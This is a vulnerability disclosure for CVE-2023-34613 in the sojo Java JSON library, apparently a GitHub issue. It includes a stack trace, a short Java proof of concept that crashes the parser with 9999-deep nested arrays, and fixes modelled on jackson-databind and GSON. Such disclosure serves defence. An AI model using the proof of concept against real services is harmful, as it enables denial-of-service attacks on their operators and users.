Headline
CVE-2023-34613: Stack overflow error caused by sojo parsing of untrusted JSON String · Issue #15 · maddingo/sojo
An issue was discovered sojo thru 1.1.1 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.
Stack overflow error caused by sojo parsing of untrusted JSON String****Description
Using sojo to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_scan_token(JsonParserGenerate.java:503)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_4(JsonParserGenerate.java:344)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_3(JsonParserGenerate.java:374)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:351)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_6(JsonParserGenerate.java:313)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_6(JsonParserGenerate.java:258)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:357)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_2_13(JsonParserGenerate.java:252)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:144)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
PoC
<dependency\>
<groupId\>net.sf.sojo</groupId\>
<artifactId\>sojo</artifactId\>
<version\>1.1.1</version\>
</dependency\>
import net.sf.sojo.interchange.json.JsonParser;
public class PoC {
public final static int TOO\_DEEP\_NESTING = 9999;
public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");
public static String \_nestedDoc(int nesting, String open, String close, String content) {
StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
for (int i = 0; i < nesting; ++i) {
sb.append(open);
if ((i & 31) == 0) {
sb.append("\\n");
}
}
sb.append("\\n").append(content).append("\\n");
for (int i = 0; i < nesting; ++i) {
sb.append(close);
if ((i & 31) == 0) {
sb.append("\\n");
}
}
return sb.toString();
}
public static void main(String\[\] args) {
String jsonString = TOO\_DEEP\_DOC;
JsonParser parser = new JsonParser();
parser.parse(jsonString);
}
}
Rectification Solution
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))
Related news
An issue was discovered sojo thru 1.1.1 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.